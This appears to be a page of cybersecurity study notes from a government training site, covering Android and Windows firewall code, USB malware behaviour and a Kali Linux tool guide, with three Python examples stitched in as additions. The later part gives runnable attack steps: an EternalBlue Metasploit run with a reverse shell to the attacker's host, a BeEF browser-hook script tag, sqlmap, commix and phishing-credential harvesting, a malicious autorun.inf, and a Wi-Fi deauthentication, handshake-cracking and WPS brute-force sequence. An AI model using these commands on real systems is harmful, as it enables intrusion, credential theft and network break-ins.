https://www.istm.gov.in/home/user_datails/234
Kali Linux is a specialized Linux distribution used for ethical hacking, penetration testing, and cybersecurity research.
Parrot OS – Lightweight and privacy-focused; includes hacking + anonymity tools.
BackBox – Ubuntu-based, designed for penetration testing and vulnerability assessment.
BlackArch Linux – Arch-based distro with 2,800+ hacking tools.
Pentoo – Gentoo-based, focused on penetration testing and security auditing.
DEFT Linux – Focused on digital forensics and incident response.
NST (Network Security Toolkit) – Fedora-based, for network security analysis.
CAINE – Specifically for computer forensics and data recovery.
Each has its own strengths — but Kali and Parrot OS are the most widely used for offensive security.
Modus Operandi (MO) is a Latin term that means "method of operation."
In security and crime-related contexts, it refers to:
The specific way or pattern in which a crime or security breach is typically committed.
It includes:
Techniques used by criminals or attackers
Tools or technologies employed
Behavioral patterns and target selection
Timing, location, and method of execution
👉 Understanding the MO helps in anticipating, detecting, and preventing future threats.
Here are common security tips and techniques (especially for cyber and physical security):
🔐 1. Password Safety
Use strong, unique passwords
Enable 2-factor authentication
Avoid sharing passwords
🌐 2. Internet Safety
Avoid clicking on unknown links/emails
Use HTTPS websites only
Clear browsing data regularly
💻 3. Device Protection
Install antivirus and keep it updated
Use firewalls
Lock screen when not in use
🧑💼 4. Social Engineering Awareness
Don’t share sensitive info over calls/emails
Verify identity before responding
Be cautious of phishing or impersonation
📁 5. Data Security
Backup data regularly
Encrypt sensitive files
Follow access control policies
🏢 6. Physical Security
Use ID cards, biometric access
Monitor CCTV regularly
Keep entry-exit logs for visitors
🛑 7. Incident Reporting
Report suspicious activity immediately
Maintain a security incident register
🧠 8. Awareness and Training
Conduct regular awareness sessions
Simulated drills (cyber/physical threats)
Promote a "security-first" culture
You can build a firewall app using Android’s VPNService API, which lets you create a local VPN tunnel and filter traffic.
What you need:
Android Studio
Java or Kotlin
Basic understanding of Android app development
Permissions: BIND_VPN_SERVICE, INTERNET, etc.
What the app will do:
Intercept traffic using VpnService
Filter or block traffic based on app, IP, port, or domain
Allow or deny connections
Optionally log traffic
Steps:
Create a VpnService subclass
Build the tunnel with VpnService.Builder and call establish()
Use the ParcelFileDescriptor that establish() returns to read and write raw packets
Parse packets (optional: use a library like Pcap4J)
Add filtering rules based on user input
Forward allowed packets to their destination
Block or drop the others
A rooted Android device means:
You have full control over your phone — like the "admin" or "owner" of everything inside it.
Imagine your phone is a tractor.
Normally, you’re only allowed to drive it and change a few settings.
But you can’t open the engine, change deep parts, or install powerful tools.
When you root it, it’s like getting the master key to open up everything:
You can modify the engine
Remove built-in parts
Add new, custom parts
Do things the company usually doesn’t allow
It removes the restrictions put by the manufacturer (like Samsung, Vivo, etc.)
You can now:
Install special apps
Change system files
Control the whole device like a hacker or developer
Rooting can void warranty
You might break the phone if something goes wrong
Can make your device less secure if not managed properly
So in short:
Rooting = Getting full control of your phone, like becoming the “boss” of it.
If your Android is rooted:
Use iptables (Linux command-line firewall system)
Write your own firewall rules (e.g., block a certain IP, port, or app UID)
Automate with shell scripts or Termux
Example:
iptables -A OUTPUT -p tcp --dport 80 -j DROP
Set up a Raspberry Pi or old PC with Linux
Install iptables, UFW, or pfSense
Connect all devices through that router/firewall
Control/block traffic network-wide
Custom firewalls need deep packet inspection if you're doing advanced filtering
VPN-based firewalls won’t work simultaneously with commercial VPNs
Be mindful of battery and performance issues if running real-time traffic filters
Platform = Way to Build Firewall
Android (no root) = Use VPNService API (Java/Kotlin app)
Android (rooted) = Use iptables
Laptop/Desktop = Use UFW, Windows Firewall, or write custom scripts
Network-wide = Set up a Raspberry Pi or pfSense box
📱 Android Firewall App (No Root Needed)
Requirements:
Android Studio
Java or Kotlin
API Level 21+
AndroidManifest.xml:
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.firewall">
    <application
        android:allowBackup="true"
        android:label="Firewall"
        android:supportsRtl="true"
        android:theme="@style/Theme.AppCompat.Light.DarkActionBar">
        <service
            android:name=".MyVPNService"
            android:permission="android.permission.BIND_VPN_SERVICE">
            <intent-filter>
                <action android:name="android.net.VpnService" />
            </intent-filter>
        </service>
    </application>
</manifest>
MyVPNService.java:
import android.net.VpnService;
import android.os.ParcelFileDescriptor;
import java.io.IOException;

public class MyVPNService extends VpnService {
    private ParcelFileDescriptor vpnInterface;

    @Override
    public void onCreate() {
        super.onCreate();
        startVPN();
    }

    private void startVPN() {
        // Builder here is VpnService.Builder. The user must already have accepted the
        // VpnService.prepare() consent dialog (handled in MainActivity), otherwise
        // establish() returns null instead of a tunnel.
        Builder builder = new Builder();
        builder.setSession("MyFirewallVPN")
               .addAddress("10.0.0.2", 32) // Virtual IP
               .addRoute("0.0.0.0", 0);    // Route all traffic
        try {
            vpnInterface = builder.establish();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public void onDestroy() {
        super.onDestroy();
        try {
            if (vpnInterface != null) {
                vpnInterface.close(); // tears down the tunnel; traffic flows normally again
                vpnInterface = null;
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Also add this permission to AndroidManifest.xml (outside the <application> element):
<uses-permission android:name="android.permission.INTERNET" />
MainActivity.java:
import android.content.Intent;
import android.net.VpnService;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    private static final int VPN_REQUEST_CODE = 0x0F;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // prepare() returns an Intent when the user has not yet granted VPN consent
        Intent intent = VpnService.prepare(this);
        if (intent != null) {
            startActivityForResult(intent, VPN_REQUEST_CODE);
        } else {
            onActivityResult(VPN_REQUEST_CODE, RESULT_OK, null);
        }
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        if (requestCode == VPN_REQUEST_CODE && resultCode == RESULT_OK) {
            Intent intent = new Intent(this, MyVPNService.class);
            startService(intent);
        }
        super.onActivityResult(requestCode, resultCode, data);
    }
}
What this code does:
Creates a dummy VPN interface
Routes all traffic through it
Doesn’t filter yet — you can build filtering logic using packet inspection libraries (like Pcap4J, jNetPcap). Note that as written nothing reads from the tunnel's file descriptor, so every routed packet is silently dropped: until you add the read/forward loop the app behaves like a block-everything firewall.
Next steps:
Add traffic filtering by IP/domain
Use selectors to allow/block traffic per app
Log and display data usage per app
Build a UI with toggles for each app
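The filtering step the text leaves open, shown as an added example in Python rather than in the app's Java (this is not code from the page): it parses a raw IPv4 packet exactly as the VPN app would read it from the ParcelFileDescriptor and applies ordered allow/block rules by destination network, port and protocol, failing closed on anything that is not well-formed IPv4. The packets and rules are constructed for the demo.

```python
import ipaddress
import struct
from dataclasses import dataclass
from typing import List, Optional

PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17


@dataclass
class Packet:
    proto: int
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    src_port: Optional[int]  # None for protocols without ports (e.g. ICMP)
    dst_port: Optional[int]


def parse_ipv4(raw: bytes) -> Optional[Packet]:
    """Parse the IPv4 header (plus TCP/UDP ports) of one packet read from the tun fd.

    Returns None for anything that is not a well-formed IPv4 packet (IPv6, truncated data).
    """
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4  # header length in bytes, options included
    if ihl < 20 or len(raw) < ihl:
        return None
    proto = raw[9]
    src = ipaddress.IPv4Address(raw[12:16])
    dst = ipaddress.IPv4Address(raw[16:20])
    sport = dport = None
    if proto in (PROTO_TCP, PROTO_UDP) and len(raw) >= ihl + 4:
        sport, dport = struct.unpack("!HH", raw[ihl:ihl + 4])  # ports lead both headers
    return Packet(proto, src, dst, sport, dport)


@dataclass
class Rule:
    action: str  # "allow" or "block"
    dst_net: Optional[ipaddress.IPv4Network] = None
    dst_port: Optional[int] = None
    proto: Optional[int] = None

    def matches(self, p: Packet) -> bool:
        return ((self.dst_net is None or p.dst in self.dst_net)
                and (self.dst_port is None or p.dst_port == self.dst_port)
                and (self.proto is None or p.proto == self.proto))


def decide(raw: bytes, rules: List[Rule], default: str = "allow") -> str:
    """First matching rule wins. Malformed or non-IPv4 packets are blocked (fail closed).

    In the app, "allow" means forwarding the packet on a protected socket and "block"
    means simply not forwarding it.
    """
    p = parse_ipv4(raw)
    if p is None:
        return "block"
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return default


def build_ipv4(proto: int, src: str, dst: str, sport: int = 0, dport: int = 0) -> bytes:
    """Constructed test packet: IPv4 header plus a bare TCP or UDP header (checksums left at 0)."""
    l4 = b""
    if proto == PROTO_TCP:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 65535, 0, 0)
    elif proto == PROTO_UDP:
        l4 = struct.pack("!HHHH", sport, dport, 8, 0)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0x4000, 64, proto, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return header + l4


# Constructed rule set: block a documentation range, block cleartext HTTP, allow DNS.
RULES = [
    Rule("block", dst_net=ipaddress.IPv4Network("203.0.113.0/24")),
    Rule("block", dst_port=80, proto=PROTO_TCP),
    Rule("allow", dst_port=53, proto=PROTO_UDP),
]

if __name__ == "__main__":
    for pkt in (build_ipv4(PROTO_TCP, "10.0.0.2", "203.0.113.9", 40000, 443),
                build_ipv4(PROTO_TCP, "10.0.0.2", "198.51.100.7", 40001, 80),
                build_ipv4(PROTO_UDP, "10.0.0.2", "198.51.100.53", 40002, 53)):
        print(parse_ipv4(pkt), "->", decide(pkt, RULES))
```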
To build the basic Android firewall app from the code above, start by installing Android Studio.
That’s where you’ll write the app.
Android Studio is like the kitchen where you’ll "cook" your app (code, run, test it).
Download & install it (it's free).
Open it — it might take a few minutes to set up.
Click "New Project"
Choose "Empty Activity"
Name your app: e.g., MyFirewallApp
Language: Choose Java
Click Finish
Now Android Studio will create a basic app project for you. Think of it like the empty pot where you'll add your ingredients (your code).
You will see folders like:
app >
  java >
    com.example.myfirewallapp >
      MainActivity.java ← (Paste MainActivity code here)
Double-click MainActivity.java
Replace everything inside it with the code I gave for MainActivity
Next:
Right-click the same folder (com.example...) → New → Java Class → Name it MyVPNService
Paste the code for MyVPNService.java here.
Now:
You’ll find it here:
app > manifests > AndroidManifest.xml
Add the permissions and service code I gave you there.
✅ You can either:
Connect your Android phone via USB (Enable "Developer Options" and "USB Debugging")
Or use the built-in Emulator in Android Studio
Then click the green Play button (▶️) to launch your app.
The app will ask for permission to create a VPN connection
Tap "Allow"
Now your app starts routing traffic — your firewall foundation is ready!
👉 Install it on your laptop or PC.
💻 NOT on your Android phone.
Go to this link on your laptop:
👉 https://developer.android.com/studio
Click the big “Download Android Studio” button
Agree to terms → Download starts
Once the .exe (for Windows) or .dmg (for Mac) file is downloaded:
Open the file
Click Next → Next → Install
After installation, open Android Studio
It gives you the full tools to create Android apps
You write and test your firewall app on your laptop
Then you install it (run it) on your Android phone
Question - Answer
Where to install Android Studio? - 💻 On your laptop
Can I install it on Android phone? - ❌ No, not possible
What do I do after installation? - ✅ Create your app and test it on phone
🟢 What is F-Droid?
F-Droid is like a Play Store — but for free and open-source apps only.
✅ It's a place where you can download Android apps that are:
Free of cost
Open-source (you can see and check the code)
No ads, no tracking, no spying
Often useful for techies, developers, ethical hackers, and privacy-conscious users
It was started by the F-Droid community in 2010
It is maintained by independent developers and privacy advocates
It’s not controlled by Google, which makes it very different from Play Store
Apps like:
🔐 Privacy tools (NetGuard, TrackerControl)
🧑💻 Developer tools (Termux, packet sniffers)
📱 Root tools (AFWall+, OpenVPN, firewall apps)
🧘♀️ Minimal apps (lightweight browsers, note apps, etc.)
Feature - F-Droid - Play Store
Ads - ❌ No ads - ✅ Many apps have ads
Trackers - ❌ No spying - ⚠️ Some apps track you
Source Code - ✅ Open-source - ❌ Not available
Root Tools - ✅ Many available - ❌ Often banned
Free Apps - Totally free - ⚠️ Some paid, some free
⚠️ You won’t find F-Droid on the Play Store (Google doesn't allow it!)
On your phone, open any browser
Go to 👉 https://f-droid.org
Download the F-Droid APK
When asked, allow “Install from unknown sources”
Install and open F-Droid
Browse and install apps like Termux, AFWall+, etc.
Think of F-Droid as a local organic market — everything is clean, open, and safe — compared to a big supermarket (Play Store) that sells both healthy and junk stuff with ads everywhere.
👉 iptables is a firewall command-line tool used in Linux systems (including Android, because Android is built on Linux!).
It helps you:
Block or allow internet for apps
Control incoming and outgoing network traffic
Protect the system by setting rules
iptables is like a digital traffic policeman.
You write rules like:
"Let Chrome go online" ✅
"Block WhatsApp from internet" ❌
"Stop all outgoing traffic" 🚫
You run it on your Android phone (but only if it is rooted ❗)
Not on your laptop.
🔹 1. Termux App (from F-Droid, not Play Store)
A terminal app (like command prompt for Android)
You type commands in it
Works like a mini Linux on your phone
🔹 2. Root Terminal App
Any terminal that allows su (superuser) command
You need to grant root permission when asked
Install Termux from https://f-droid.org/
Open Termux
Type this command to get root access:
su
(Your phone will ask: "Grant Root Access?" → tap ALLOW)
Now you can use iptables commands like:
iptables -P OUTPUT DROP # block all outgoing traffic
or:
iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT
(Allow traffic only for an app with UID 10123)
You are doing powerful system-level stuff, so be cautious
These commands only work if your device is rooted
After rebooting, rules go away unless you save them or use a firewall app like AFWall+
If you're not comfortable typing commands, install AFWall+ and just check/uncheck boxes to allow or block apps.
Question - Answer
What is iptables? - A Linux firewall command system
Where to run it? - On rooted Android phone using apps like Termux
Can I run it on laptop? - ❌ No, not for controlling your phone's internet
Is there an easy way? - ✅ Yes! Use AFWall+ app instead
This is like writing your own firewall script — the same as a Linux computer.
A rooted Android device
A terminal app (like Termux or a Root-enabled Terminal Emulator)
Superuser (root) access
BusyBox (optional but helpful)
🔒 Block all outgoing internet:
su
iptables -P OUTPUT DROP
🌐 Allow only browser (say Chrome) to use internet:
First, find Chrome's UID:
dumpsys package com.android.chrome | grep userId=
Assume it shows UID: 10123
Now allow only Chrome:
iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT
🛑 Block WhatsApp from internet:
Find UID of WhatsApp:
dumpsys package com.whatsapp | grep userId=
Then:
iptables -A OUTPUT -m owner --uid-owner <WhatsApp_UID> -j DROP
These rules reset after reboot. To make them permanent, use init.d scripts, firewall apps for rooted phones, or write a boot script.
Be careful — blocking the wrong UID might break important apps.
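An added example (not from the page, and run on a laptop rather than the phone) that models the OUTPUT chain the rules above build: it pulls the UID out of a constructed dumpsys excerpt, emits the same iptables commands as the text, and evaluates which UIDs get through, including the ordering pitfall that a catch-all ACCEPT appended earlier hides any per-app DROP added after it.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt of `dumpsys package com.android.chrome` output (the line the text greps for).
SAMPLE_DUMPSYS = """Package [com.android.chrome] (3f2a1b0):
  userId=10123
  pkgFlags=[ HAS_CODE ALLOW_CLEAR_USER_DATA ]
"""


def uid_from_dumpsys(output: str) -> Optional[int]:
    """Return the app UID from dumpsys output, or None if no userId= line is present."""
    m = re.search(r"^\s*userId=(\d+)\s*$", output, re.MULTILINE)
    return int(m.group(1)) if m else None


@dataclass
class Rule:
    target: str                 # "ACCEPT" or "DROP"
    uid: Optional[int] = None   # None = no "-m owner" match, so the rule hits every packet

    def command(self) -> str:
        owner = f" -m owner --uid-owner {self.uid}" if self.uid is not None else ""
        return f"iptables -A OUTPUT{owner} -j {self.target}"


@dataclass
class OutputChain:
    """Model of the OUTPUT chain: rules are checked in order; the policy applies when none match."""
    policy: str = "ACCEPT"
    rules: List[Rule] = field(default_factory=list)

    def append(self, rule: Rule) -> "OutputChain":
        self.rules.append(rule)  # same semantics as iptables -A (append at the end)
        return self

    def decide(self, uid: int) -> str:
        for rule in self.rules:
            if rule.uid is None or rule.uid == uid:
                return rule.target  # ACCEPT and DROP are terminating targets: first match wins
        return self.policy

    def commands(self) -> List[str]:
        return [f"iptables -P OUTPUT {self.policy}"] + [r.command() for r in self.rules]


def allow_only(uids: List[int]) -> OutputChain:
    """The text's 'block everything, then allow Chrome' layout: default DROP plus one ACCEPT per UID."""
    chain = OutputChain(policy="DROP")
    for uid in uids:
        chain.append(Rule("ACCEPT", uid))
    return chain


def block_only(uids: List[int]) -> OutputChain:
    """The text's 'block WhatsApp' layout: default ACCEPT plus one DROP per UID."""
    chain = OutputChain(policy="ACCEPT")
    for uid in uids:
        chain.append(Rule("DROP", uid))
    return chain


if __name__ == "__main__":
    chrome = uid_from_dumpsys(SAMPLE_DUMPSYS)
    for cmd in allow_only([chrome]).commands():
        print(cmd)
    # Ordering pitfall: a catch-all ACCEPT appended earlier shadows any DROP added after it.
    shadowed = OutputChain("ACCEPT").append(Rule("ACCEPT")).append(Rule("DROP", 10456))
    print("uid 10456 behind a catch-all ACCEPT ->", shadowed.decide(10456))  # ACCEPT, not DROP
```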
🔹 AFWall+ (Android Firewall Plus)
Free app from Play Store or F-Droid
Uses iptables in background
Easy UI to block internet per app (Wi-Fi/data)
💡 Tip: After installing AFWall+, grant root access, then simply toggle apps to block/allow internet.
Option - Tool - Skill Level
Write your own firewall - iptables in Termux - Intermediate to Advanced
Easy UI method - AFWall+ - Beginner-friendly
Building a custom firewall on your Windows laptop or PC means you’ll:
Control which apps can access internet
Block incoming or outgoing connections
Set custom rules to protect your computer from hackers or leaks
Windows already comes with a powerful firewall, and you can create custom rules in it — no need to install anything.
Search "Windows Defender Firewall" in Start Menu
Click “Advanced Settings” on the left side
This opens Windows Firewall with Advanced Security
Now, you’ll see:
Inbound Rules – For connections coming into your computer
Outbound Rules – For connections leaving your computer
Let’s say you want to block Chrome:
Click Outbound Rules > New Rule (on right side)
Select Program > Next
Browse and select the app you want to block (e.g., chrome.exe)
Choose Block the connection > Next
Select all profiles (Domain, Private, Public) > Next
Name it “Block Chrome” > Finish ✅
🎉 Done! Chrome can no longer access the internet.
If you love command-line:
New-NetFirewallRule -DisplayName "Block Chrome" -Direction Outbound -Program "C:\Program Files\Google\Chrome\Application\chrome.exe" -Action Block
This does the same as above — but faster.
If you’re a developer (or learning):
Use languages like Python, C#, or C++
Use Windows Filtering Platform (WFP) APIs
Or use WinDivert – a Windows packet capture/divert library
But this is very advanced and not needed unless you're building a full custom product.
Goal = Method
Block internet for apps = Use Windows Firewall Advanced Settings
Do it with commands = Use PowerShell
Build full custom firewall = Use C#/C++ + WinDivert or WFP (Advanced)
Use this if you want to quickly block or allow apps from accessing the internet.
🔐 Example: Block Chrome from using the internet
New-NetFirewallRule -DisplayName "Block Chrome Outbound" `
-Direction Outbound `
-Program "C:\Program Files\Google\Chrome\Application\chrome.exe" `
-Action Block
You can first block everything and then allow specific apps:
# Block all outbound traffic (⚠️ Be careful!)
Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Block
# Allow Notepad
New-NetFirewallRule -DisplayName "Allow Notepad" `
-Direction Outbound `
-Program "C:\Windows\System32\notepad.exe" `
-Action Allow
✅ To undo, run:
Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Allow
Press Start → search “PowerShell” → Run as Administrator
Paste the above code and hit Enter
Done! You’ve created a firewall rule 🔐
You can also capture and analyze packets using Python + pydivert (a wrapper for WinDivert).
pip install pydivert
Python script (needs the WinDivert driver that pydivert bundles and an elevated prompt):
import pydivert

# WinDivert's filter language compares whole addresses, so the Facebook /16 is written as a range.
FILTER = "outbound and ip.DstAddr >= 157.240.0.0 and ip.DstAddr <= 157.240.255.255"

with pydivert.WinDivert(FILTER) as w:
    for packet in w:
        print("Blocked:", packet.dst_addr)
        # Not calling w.send(packet) drops the packet, which is what blocks it.
This will block outbound traffic to Facebook's IP range.
⚠️ Run as Administrator (script needs admin rights to work).
Task = Tool = Code Type
Block an app (e.g., Chrome) = PowerShell = ✅ Simple & Recommended
Block websites/IPs = Python + pydivert = 🔧 Advanced
Custom rule-based blocking = C#/C++ with WinDivert/WFP = 👨💻 Expert Level
You insert the USB pen drive into the port.
The motherboard's USB controller sends a signal to the Windows kernel: “Hey, something new is connected!”
Windows checks what kind of device is connected using Plug and Play (PnP).
It reads the device’s Vendor ID, Product ID, and Device Class.
If drivers are already available, it installs automatically (usually silently in seconds).
Windows sees the USB as a storage device (Disk Drive class).
It checks the file system (FAT32, exFAT, NTFS, etc.)
If it’s valid, it assigns a drive letter (like E:\ or F:)
🔍 This is when you hear the "ding" sound, and the USB becomes visible.
Windows looks for a file called autorun.inf on the drive.
This file can tell Windows: “Open this file or app automatically.”
⚠️ AutoRun is disabled by default in modern Windows (for security), but older PCs or misconfigured systems may still allow it. That’s how viruses can launch automatically.
The explorer.exe process (your file browser) updates the drive list.
You now see the USB in "This PC" and can click to open it.
Here’s how a virus might sneak in:
If AutoRun is on, a file like malware.exe is automatically executed.
This could be a keylogger, ransomware, worm, or backdoor.
Example autorun.inf content:
[autorun]
open=malware.exe
Even if AutoRun is off, you might double-click an infected file (e.g., PDF, EXE, DOC with macros).
Boom 💥 — virus activates.
It may store itself in:
Startup Folder
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Registry (auto start entry)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
System Folders (hidden)
C:\Windows\System32
C:\Users\<Username>\AppData\Local\Temp
Scheduled Tasks
Creates hidden tasks to auto-run on boot
Renames itself like “svchost.exe” to look like a system file
Hides with attributes: attrib +h +s +r malware.exe
Runs in background silently
Use Task Manager or Process Explorer
Use tools like Autoruns (by Sysinternals)
Scan with good antivirus or Windows Defender Offline Scan
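An added example (not from the page) of the checks a USB-scanning script would make for the two tricks described above: it reads an autorun.inf and reports every key that would launch a program (open=, shellexecute=, shell\verb\command=), and it flags files that borrow a system binary name like svchost.exe while sitting outside the Windows directories. Both autorun.inf samples are constructed.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Keys in [autorun] that cause something to run; icon=, label= and action= are cosmetic.
LAUNCH_KEYS = ("open", "shellexecute")
VERB_COMMAND = re.compile(r"shell\\[^\\]+\\command")
# Names malware borrows to blend in; legitimate copies live in the Windows directories.
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}


def parse_ini(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Minimal INI reader: section names and keys are lower-cased, values kept as written."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def autorun_findings(text: str) -> List[str]:
    """Describe every way this autorun.inf could launch a program.

    An empty list means the file only sets an icon or label.
    """
    findings = []
    for key, value in parse_ini(text).get("autorun", []):
        target = value.split()[0] if value else ""
        if key in LAUNCH_KEYS:
            findings.append(f"{key}= would launch {target}")
        elif VERB_COMMAND.fullmatch(key):
            findings.append(f"context-menu verb would launch {target}")
        elif key == "shell":
            findings.append(f"default double-click verb redirected to {value}")
    return findings


def masquerades_as_system(path: str) -> bool:
    """True when a file uses a core Windows binary name but sits outside the system directories."""
    directory, name = ntpath.split(path)
    return name.lower() in SYSTEM_NAMES and directory.lower() not in SYSTEM_DIRS


# Constructed samples: the text's malicious autorun.inf with extras, and a benign vendor one.
MALICIOUS_AUTORUN = """[AutoRun]
open=malware.exe
icon=malware.exe,0
shell\\explore\\command=malware.exe /silent
"""
BENIGN_AUTORUN = """[autorun]
icon=setup.ico
label=Vendor Drivers
"""

if __name__ == "__main__":
    print(autorun_findings(MALICIOUS_AUTORUN))
    print(autorun_findings(BENIGN_AUTORUN))
    print(masquerades_as_system(r"C:\Users\bob\AppData\Local\Temp\svchost.exe"))
```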
Plug USB → Detected by USB controller → Windows loads driver → Mounts file system → AutoRun checked → File Explorer shows drive → Virus may auto-run or be clicked → Virus copies itself to system folders/startup → Tries to hide and run at boot
Disable AutoRun (usually already disabled in Win 10/11)
Never run unknown EXE files from a USB
Always scan USB with antivirus first
Keep “show hidden files” ON to spot suspicious content
Kali Linux includes:
600+ pre-installed tools
Each tool typically has multiple commands, flags, or usage options
✅ On average, each tool can have 10–50+ commands or options.
➡️ So, roughly:
600 tools × average 20 commands = 12,000+ possible hacking-related commands
This doesn’t even count the standard Linux commands, which are also used for scripting, networking, and automation.
nmap – 30+ common command variations
metasploit (msfconsole) – 1000s of modules (each a command)
aircrack-ng – 10–15 core commands
sqlmap – dozens of flags for different attack vectors
A big toolkit for finding and exploiting vulnerabilities in a target system.
msfconsole
👉 What it does:
Starts the Metasploit console — the main interface where you type all commands.
use exploit/windows/smb/ms17_010_eternalblue
👉 What it does:
Loads an exploit that targets a Windows vulnerability called EternalBlue, used in real attacks like WannaCry.
set RHOSTS <target_ip>
👉 What it does:
Sets the IP address of the victim machine you want to attack.
set LHOST <your_ip>
👉 What it does:
Sets your own IP address — so when the victim is hacked, it knows where to send access back (reverse shell).
set PAYLOAD windows/meterpreter/reverse_tcp
👉 What it does:
Tells Metasploit what kind of "weapon" to use. In this case: a reverse shell, which gives you control of the victim’s machine.
run
👉 What it does:
Launches the attack. If successful, you’ll get access to the victim’s computer.
Used to hack/control someone’s browser when they click a malicious link.
beef-xss
👉 What it does:
Starts the BeEF server. You use this to trap browsers that visit your fake web page.
<script src="http://your_ip:3000/hook.js"></script>
👉 What it does:
When a victim opens a page with this code, their browser gets hooked — meaning, you can now control their browser from your BeEF panel (e.g., pop-ups, steal cookies, redirect, etc.)
Like Metasploit, but made to hack routers and IoT devices (CCTV, smart TVs, etc.)
rsf
👉 What it does:
Starts RouterSploit's console.
use scanners/autopwn
👉 What it does:
Loads the module that automatically scans routers for known weaknesses.
set target <router_ip>
run
👉 What it does:
Targets the router at that IP and checks if it’s vulnerable to attacks.
Tool to hack into databases behind websites using SQL injection.
sqlmap -u "http://target.com/product.php?id=1" --dbs
👉 What it does:
-u: URL of the vulnerable page
--dbs: Tells sqlmap to list the databases if the site is vulnerable
If it works, you can read data like usernames, passwords, etc.
Used for command injection attacks — when a web app executes system commands without permission.
commix --url="http://target.com/index.php?name=test" --data="name=test"
👉 What it does:
Tests if you can inject system commands through the "name" field (like running ls, whoami, etc.) on the target's server.
Used to trick people (phishing) to give up passwords, or click fake websites.
setoolkit
👉 What it does:
Starts the Social Engineering Toolkit, an interactive menu tool.
Then you'd follow this path:
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
It creates a fake login page (like Facebook), and when the victim enters their password — you get it.
Finds public exploit code from the Exploit Database (offline).
searchsploit apache struts
👉 What it does:
Searches for exploits related to Apache Struts (a common web app framework).
searchsploit -m linux/local/37292.c
👉 What it does:
Copies that exploit code into your working folder so you can compile and use it.
Tool = What It Does
Metasploit = Launches real system attacks (full control)
BeEF = Controls browser (like remote puppet)
RouterSploit = Hacks routers, cameras, IoT
sqlmap = Steals data from website databases
Commix = Runs system commands through web inputs
SET = Creates fake websites to trick users
SearchSploit = Lets you search and download real exploit codes
Use Wi-Fi exploitation tools only on networks you own or have permission to test. Unauthorized use is illegal and unethical.
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
wash and reaver (for WPS attacks)
wifite (automated Wi-Fi attack tool)
Fluxion (social engineering-based Wi-Fi phishing)
sudo airmon-ng start wlan0
👉 What it does: Enables monitor mode on your Wi-Fi card so it can "listen" to all traffic nearby (not just your network).
⚠️ Replace wlan0 with your adapter name if different (iwconfig to check)
sudo airodump-ng wlan0mon
👉 What it does: Shows nearby networks, BSSIDs (MAC addresses), channels, and client devices.
Note down the BSSID and channel of your target Wi-Fi network.
sudo airodump-ng --bssid <router_bssid> -c <channel> -w capture wlan0mon
👉 What it does:
Targets a specific router
Captures handshake packets (needed to crack password)
Saves data to a file (capture.cap)
sudo aireplay-ng --deauth 10 -a <router_bssid> -c <client_mac> wlan0mon
👉 What it does:
Sends fake disconnect signals to the user — when they reconnect, you capture the handshake (Wi-Fi password exchange).
sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
👉 What it does:
Uses a wordlist (like rockyou.txt) to try different passwords and crack the captured handshake file.
sudo wifite
👉 What it does:
Scans and attacks Wi-Fi networks automatically using tools above (airodump, aircrack, etc.)
If the router has WPS enabled, try this:
sudo wash -i wlan0mon
👉 Shows WPS-enabled routers.
sudo reaver -i wlan0mon -b <bssid> -c <channel> -vv
👉 Tries to brute-force the WPS PIN and get the Wi-Fi password.
Tool = Command = What It Does
airmon-ng = airmon-ng start wlan0 = Enable monitor mode
airodump-ng = airodump-ng wlan0mon = Scan Wi-Fi networks
airodump-ng (target) = airodump-ng --bssid BSSID -c CH -w capture wlan0mon = Capture handshake
aireplay-ng = aireplay-ng --deauth 10 -a BSSID -c CLIENT wlan0mon = Force reconnect
aircrack-ng = aircrack-ng capture.cap -w rockyou.txt = Crack password
wifite = wifite = Auto-attack Wi-Fi
reaver = reaver -i wlan0mon -b BSSID -vv = Brute-force WPS
sudo apt update && sudo apt upgrade -y
The command sudo apt update && sudo apt upgrade -y is commonly used in Debian-based Linux distributions like Kali Linux to update and upgrade the system. Here's the breakdown:
sudo
Purpose: Runs the command with superuser (root) privileges because installing, updating, or modifying system files requires administrative rights.
Why Needed: Normal users don’t have permission to make system-wide changes. sudo temporarily grants that power.
apt
Purpose: This is the package manager used in Debian-based systems to handle software installation, updates, and removal.
Think of it as: The "app store" for Linux, but controlled via the terminal.
update
Purpose: This command tells apt to fetch the latest information about available software packages from online repositories (servers).
What It Does:
Downloads updated lists of available software and their versions.
Does NOT install anything yet—just updates the list.
